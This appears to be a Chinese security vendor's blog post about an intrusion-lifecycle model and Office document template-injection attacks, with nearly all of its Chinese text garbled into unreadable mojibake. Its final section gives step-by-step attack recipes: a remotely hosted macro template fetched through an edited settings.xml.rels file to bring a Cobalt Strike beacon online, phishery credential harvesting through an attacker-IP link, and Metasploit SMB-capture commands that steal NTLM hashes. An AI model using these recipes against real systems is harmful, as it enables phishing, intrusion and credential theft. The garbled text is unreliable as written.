• Ìá½»ÐèÇó
    *
    *

    *
    *
    *
    Á¢¼´Ìá½»
    µã»÷¡±Á¢¼´Ìá½»¡±£¬±íÃ÷ÎÒÀí½â²¢Í¬Òâ ¡¶»Æ½ð³Ç¿Æ¼¼Òþ˽Ìõ¿î¡·

    logo

      ²úÆ·Óë·þÎñ
      ½â¾ö·½°¸
      ¼¼ÊõÖ§³Ö
      ºÏ×÷·¢Õ¹
      ¹ØÓڻƽð³Ç

      ÉêÇëÊÔÓÃ
        ¡¶ÈëÇÖÉúÃüÖÜÆÚϸ·Öʵ¼ùÖ¸ÄÏϵÁС·£ºÄ£°æ×¢Èë¹¥»÷
        ·¢²¼Ê±¼ä£º2022-10-14 ×÷Õߣº»Æ½ð³Ç¿Æ¼¼»Æ½ð³Ç¹ÙÍøÊµÑéÊÒ ÔĶÁ´ÎÊý£º 844 ´Î

        »Æ½ð³Ç¿Æ¼¼ÎªÁ˸üºÃµØ½øÐÐÈëÇÖ¼ì²âºÍ·ÀÓù£¬²ÎÕÕ¸÷Öֻƽð³Ç¹ÙÍøÍþв¿ò¼ÜºÍ×ÔÉíµÄʵ¼ùÓë˼¿¼£¬Ìá³öÁË»ùÓÚÈëÇÖÉúÃüÖÜÆÚµÄ¹¥»÷¹ÜÀíÄ£ÐÍ£¬×÷Ϊ»Æ½ð³ÇÐÂÒ»´ú»Æ½ð³Ç¹ÙÍø¼Ü¹¹µÄÈý´óÖ§ÖùÖ®Ò»¡£

        ÈëÇÖÉúÃüÖÜÆÚv1.0°ÑÈëÇÖ¹ý³Ì»®·ÖΪ7¸ö½×¶Î£ºÌ½Ë÷·¢ÏÖ¡¢ÈëÇֺ͸ÐȾ¡¢Ì½Ë÷¸ÐÖª¡¢´«²¥¡¢³Ö¾Ã»¯¡¢¹¥»÷ºÍÀûÓᢻָ´¡£ÈëÇÖÉúÃüÖÜÆÚv1.0ͬÑùÒÔATT&CK×÷Ϊ»ù±¾Õ½Êõ֪ʶ¿â£¬Æ¥Åäµ½²»Í¬µÄÈëÇֽ׶Ρ£ÐèҪעÒâµÄÊÇ£¬²¢·ÇËùÓеÄÈëÇÖ¶¼»á¾­ÀúÕâ7¸ö½×¶Î£¬Ò²Ã»Óоø¶ÔµÄÏßÐÔ´ÎÐò¡£

        1£©Ì½Ë÷·¢ÏÖ

        ÔÚÕâ¸ö½×¶ÎÖУ¬¹¥»÷Õß»áÏÈËø¶¨¹¥»÷¶ÔÏó£¬È»ºóÀûÓÃijЩ¼¼ÊõÊֶΣ¬¾¡¿ÉÄÜ¶àµØ»ñȡĿ±ê±©Â¶³öÀ´µÄÐÅÏ¢£¬Èçͨ¹ý¶Ë¿ÚɨÃè¡¢Ö¸ÎÆÌ½²âµÈ·½Ê½£¬·¢ÏÖÃô¸Ð¶Ë¿Ú¼°°æ±¾ÐÅÏ¢£¬½ø¶øÑ°ÕÒ¹¥»÷µã£¬ÎªÏÂÒ»²½ÈëÇÖ×ö×¼±¸¡£

        2£©ÈëÇֺ͸ÐȾ

        ÔÚÕâ¸ö½×¶Î£¬¹¥»÷Õß»á¸ù¾Ý¡°Ì½Ë÷·¢ÏÖ¡±½×¶ÎËù·¢ÏÖµÄÖØÒªÐÅÏ¢£¬À´¶ÔÄ¿±ê±©Â¶³öµÄ¹¥»÷Ãæ½øÐй¥»÷³¢ÊÔ£¬ÔÚ¡°Ì½Ë÷·¢ÏÖ¡±½×¶ÎÊÕ¼¯µ½µÄÐÅÏ¢Ô½¶à£¬¹¥»÷¶ÔÏóËù±©Â¶µÄ¹¥»÷ÃæÒ²¾ÍÔ½¶à£¬¹¥»÷¸üÒ׳ɹ¦¡£

        3£©Ì½Ë÷¸ÐÖª

        ¹¥»÷ÕßÔڳɹ¦½øÈëϵͳÄÚ²¿ºó£¬ÓÉÓÚÊÇÊ״νøÈëËùÒÔ»á³öÏÖ¶ÔÄÚ²¿»·¾³²»ÊìϤµÄÇé¿ö£¬Õâʱ¹¥»÷Õߵ͝×÷Ò»°ã»áÊǶԵ±Ç°Ëù´¦»·¾³½øÐÐ̽Ë÷£¬ÃþÇåÄÚ²¿´óÖµÄÍøÂç½á¹¹£¬³£³£°éËæ×ű»ÈëÇÖ±¾»úµÄÃô¸ÐÐÅÏ¢ÊÕ¼¯ÒÔ¼°¶ÔÄÚÍø´óÁ¿µÄ¶Ë¿Ú½øÐÐɨÃ裬ºóÐø¸ù¾Ý¹¥»÷ÕßµÄÄ¿µÄ½øÐÐÏÂÒ»²½²Ù×÷¡£

        4£©´«²¥

        Ôڴ˽׶Σ¬¹¥»÷Õ߸ù¾ÝÉÏÒ»½×¶ÎÔÚÄÚÍøÌ½Ë÷¸ÐÖªÊÕ¼¯µ½µÄÐÅÏ¢£¬Ñ¡ÔñÌØ¶¨µÄ¹¥»÷ÊÖ·¨¡£ÈçÈô·¢ÏÖÄÚ²¿ÊÇÓò»·¾³£¬¹¥»÷Õß¿ÉÄ᳢ܻÊÔÏȹ¥ÆÆÓò¿Ø·þÎñÆ÷£¬ÔÙ´«²¥ÆäËû»úÆ÷¡£ÈôÊǹ¤×÷×é»·¾³£¬¿ÉÄÜ»áÀûÓÃÊÕ¼¯µ½µÄ¶Ë¿ÚºÍ·þÎñÐÅÏ¢£¬Ñ¡ÔñÌØ¶¨Â©¶´½øÐÐÅúÁ¿É¨Ãè¹¥»÷£¬À´¾¡¿ÉÄÜ¶àµØ¼ÌÐø»ñµÃÆäËû¼ÆËã»úµÄ¿ØÖÆÈ¨¡£

        5£©³Ö¾Ã»¯

        ¹¥»÷ÕßÔÚ¶Ô×ʲú½øÐжñÒâ²Ù×÷ºó£¬ÎªÁËÄܹ»¼õÉÙÔÙ´ÎÁ¬½ÓµÄ¹¥»÷³É±¾£¬·½±ãÏ´νøÈ룬»á½øÐС°ÁôºóÃÅ¡±µÄ²Ù×÷£¬³£¼ûµÄºóÃÅÈ磺½¨Á¢¼Æ»®ÈÎÎñ£¬¶¨Ê±Á¬½ÓÔ¶³Ì·þÎñÆ÷£»ÉèÖÿª»úÆô¶¯³ÌÐò£¬ÔÚÿ´Î¿ª»úʱ´¥·¢Ö´ÐÐÌØ¶¨¶ñÒâ³ÌÐò£»Ð½¨ÏµÍ³¹ÜÀíÔ±Õ˺ŵÈ¡£ÕâÑù±ãÓÚ¹¥»÷ÕßÏ´οìËٵǼ²¢¿ØÖƸÃϵͳ¡£

        6£©¹¥»÷ºÍÀûÓÃ

        ¹¥»÷ÕßÔڴ˽׶αã»á¿ªÊ¼¶ÔÄ¿±ê×ʲú½øÐжñÒâ²Ù×÷£¬°´ÕÕ¹¥»÷ÕßÒâÔ¸£¬¶ÔÄÜÀûÓõÄÊý¾Ý½øÐÐÇÔÈ¡¡¢ÀûÓã»¶Ô²Ù×÷ϵͳ¡¢Ãô¸ÐÎļþ½øÐÐÆÆ»µ¡¢É¾³ý¡£ËùÓеķÀÓùÊֶζ¼Ó¦¸Ã¼«Á¦×èÖ¹¹¥»÷Õß½øÐе½ÕâÒ»½×¶Î¡£

        7£©»Ö¸´

        ¹¥»÷ÕßÔÚÖ´ÐÐËùÓеĹ¥»÷²Ù×÷ʱ£¬ÍùÍù»áÔÚϵͳÉÏÁôÏ´óÁ¿µÄÐÐΪÈÕÖ¾£¬Òò´ËÔÚÕâÒ»½×¶Î£¬¹¥»÷Õß»á¶Ô¼Ç¼×ÔÉíºÛ¼£µÄËùÓÐÈÕÖ¾½øÐд¦Àí£¬»òɾ³ý»ò»ìÏý£¬´Ó¶øÏûÃðÖ¤¾Ý£¬ÌÓ±Ü×·×Ù¡£
        ±¾ÏµÁÐÎÄÕ»ùÓڻƽð³Ç¿Æ¼¼ÈëÇÖÉúÃüÖÜÆÚ1.0¼Ü¹¹£¬Ï¸·Ö¸÷½×¶Î¹¥»÷Õߵij£Óù¥»÷ÊֶΣ¬²¢¶ÔÏà¹Ø¹¥»÷ÊֶεľßÌåʵʩ·½Ê½½øÐÐÖðÒ»ÆÊÎö£¬Îª»Æ½ð³Ç¹ÙÍø·ÀÓù½¨ÉèÌṩÓÐÁ¦ÖªÊ¶²¹³äºÍ·´ÖÆ×¼±¸¡£


        Ä£°å×¢Èë¹¥»÷£¨¹¥»÷ºÍÀûÓã©

        ¹¥»÷Õß¿ÉÄÜ»áÔÚ Office ÎĵµÄ£°åÖд´½¨»òÐÞ¸ÄÒýÓÃÒÔÒþ²Ø¶ñÒâ´úÂë»òÇ¿ÖÆ½øÐÐÉí·ÝÑéÖ¤³¢ÊÔ¡£Microsoft µÄ Office Open XML (OOXML) ¹æ·¶Îª Office Îĵµ£¨.docx¡¢xlsx¡¢.pptx£©¶¨ÒåÁËÒ»ÖÖ»ùÓÚ XML µÄ¸ñʽ£¬ÒÔÌæ»»¾ÉµÄ¶þ½øÖƸñʽ£¨.doc¡¢.xls¡¢.ppt£©¡£OOXML ÎļþÓɸ÷ÖÖ XML Îļþ£¨³ÆÎª²¿·Ö£©×é³ÉµÄ ZIP µµ°¸´ò°üÔÚÒ»Æð£¬ÕâЩÎļþ°üº¬¹²Í¬¶¨ÒåÎĵµ³ÊÏÖ·½Ê½µÄÊôÐÔ¡£²¿¼þÊôÐÔ¿ÉÒÔÒýÓÃͨ¹ýÔÚÏß URL ·ÃÎʵĹ²Ïí¹«¹²×ÊÔ´¡£

        ¹¥»÷Õß¿ÉÄÜ»áÀÄÓÃÕâÏî¼¼ÊõÀ´Òþ²ØÒªÍ¨¹ýÎĵµÖ´ÐеĶñÒâ´úÂë¡£×¢ÈëÎĵµµÄÄ£°åÒýÓÿÉÄÜ»áÔÚ¼ÓÔØÎĵµÊ±»ñÈ¡ºÍÖ´ÐжñÒâ¸ºÔØ¡£ÕâЩÎĵµ¿ÉÒÔͨ¹ýÍøÂçµöÓãºÍ/»òÎ۵㹲ÏíÄÚÈÝµÈÆäËû¼¼Êõ´«ËÍ£¬²¢ÇÒ¿ÉÄÜ»áÌӱܾ²Ì¬¼ì²â¡£´Ë¼¼Êõ»¹¿ÉÒÔͨ¹ý×¢Èë SMB/HTTPS£¨»òÆäËûƾ¾ÝÌáʾ£©URL ²¢´¥·¢Éí·ÝÑéÖ¤³¢ÊÔÀ´ÆôÓÃÇ¿ÖÆÉí·ÝÑéÖ¤¡£

        ´ÓÈëÇÖÉúÃüÖÜÆÚ½Ç¶È·ÖÎö,¸Ã¹¥»÷ÊÖ·¨±»Ê¹ÓÃÔÚÈëÇֺ͸ÐȾ½×¶Î¡£

        ´Ó¹¥»÷ÐÐΪÁ´ÌõµÄÉÏÏÂÎÄÀ´¿´£¬Õë¶ÔÄ£°å×¢ÈëÊäÈëÊä³öÈçÏÂ

        ÊäÈ룺¹¥»÷ÕßÖÆ×÷ÁËÒ»¸öº¬ÓжñÒâÁ´½ÓÄ£°åµÄwordÎĵµ£¬²¢½«¸ÃÎĵµ·¢ËÍÖÁÄ¿±ê

        Êä³ö£ºÊܺ¦Õßµã»÷wordÎĵµ£¬×ÔÉí»úÆ÷Êܵ½Î£º¦

        Õë¶ÔÄ£°å×¢È룬¿ÉÑ¡Ôñ¹¥»÷ÊÖ·¨ÈçÏÂ

        1¡¢ ¹¥»÷Õß¹¹Ô캬ÓжñÒâÁ´½ÓÄ£°åµÄwordÎĵµ£¬¶ñÒâÁ´½ÓÄÚÈÝΪcsÉÏÏß´úÂ룬Êܺ¦Õßµã»÷ÔËÐиÃÎĵµ£¬»úÆ÷csÉÏÏß¡£

        (1)¡¢¹¥»÷Õßн¨Ò»¸öwordÎĵµ£¬²¢ÔÚÎĵµÖвåÈëºê

        (2)¡¢½«¸ÃÎĵµ±£´æÎªÄ£°åÎļþ

        (3)¡¢ÉÏ´«µ½Ô¶³Ì·þÎñÆ÷

        (4)¡¢Ð½¨Ò»¸öword£¬Ëæ»úÑ¡ÔñÒ»¸öÄ£°åʹÓÃ

        (5)¡¢½«¸ÃwordÐÞ¸ÄΪѹËõ°ü¸ñʽ£¬½âѹ

        (6)¡¢ÕÒµ½/word/_relsĿ¼ÏµÄsettings.xml.rels£¬½«TargetÖµ¸ÄΪԶ³ÌÄ£°åµØÖ·

        (7)¡¢ÖØÐÂѹËõ²¢ÐÞ¸ÄΪdocx½áβ

        (8)¡¢·¢ËÍÖÁÄ¿±ê»úÆ÷£¬Ä¿±ê»úÆ÷ÔËÐкó£¬CSÉÏÏß

        2¡¢¹¥»÷Õß¹¹Ô캬ÓжñÒâÁ´½ÓÄ£°åµÄwordÎĵµ£¬À´µÁȡĿ±êµÄwindowsµÇ¼ÃÜÂë

        (1)¡¢githubÏÂÔØphishery

        (2)¡¢Æô¶¯phishery·þÎñ¶Ë

        (3)¡¢ÀûÓÃÒÔÏÂÃüÁÁ´½Óhttps://192.168.254.135/pass×¢Èëµ½ÎĵµÖÐ

        (4)¡¢½«¸ÃÎĵµ·¢ËÍÖÁÄ¿±ê£¬Ä¿±êµã»÷ºó£¬³öÏÖÒÔϵǼ¿ò

        (5)¡¢Ä¿±êÊäÈëÕ˺ÅÃÜÂëµã»÷È·¶¨ºó£¬½«±»¼Ç¼

        3¡¢¹¥»÷Õß¹¹Ô캬ÓжñÒâÁ´½ÓÄ£°åµÄwordÎĵµ£¬À´µÁȡĿ±êµÄNTLM HASH

        (1)¡¢msfÆô¶¯smb¼àÌý

        msf > use auxiliary/server/capture/smb
        msf > set srvhost 192.168.254.135
        msf > set johnpwfile passwd
        msf > exploit


        (2)¡¢½«Ä£°åÎļþÁ´½ÓÉèÖÃΪfile://192.168.254.135/

        (3)¡¢½«Îĵµ·¢ËÍÖÁÄ¿±ê£¬Ä¿±êµã»÷ºó£¬msf½«½ÓÊÕµ½NTLM hash

        Ãâ·ÑÊÔÓÃ
        ·þÎñÈÈÏß

        ÂíÉÏ×Éѯ

        400-811-3777

        »Øµ½¶¥²¿
        ¡¾ÍøÕ¾µØÍ¼¡¿¡¾sitemap¡¿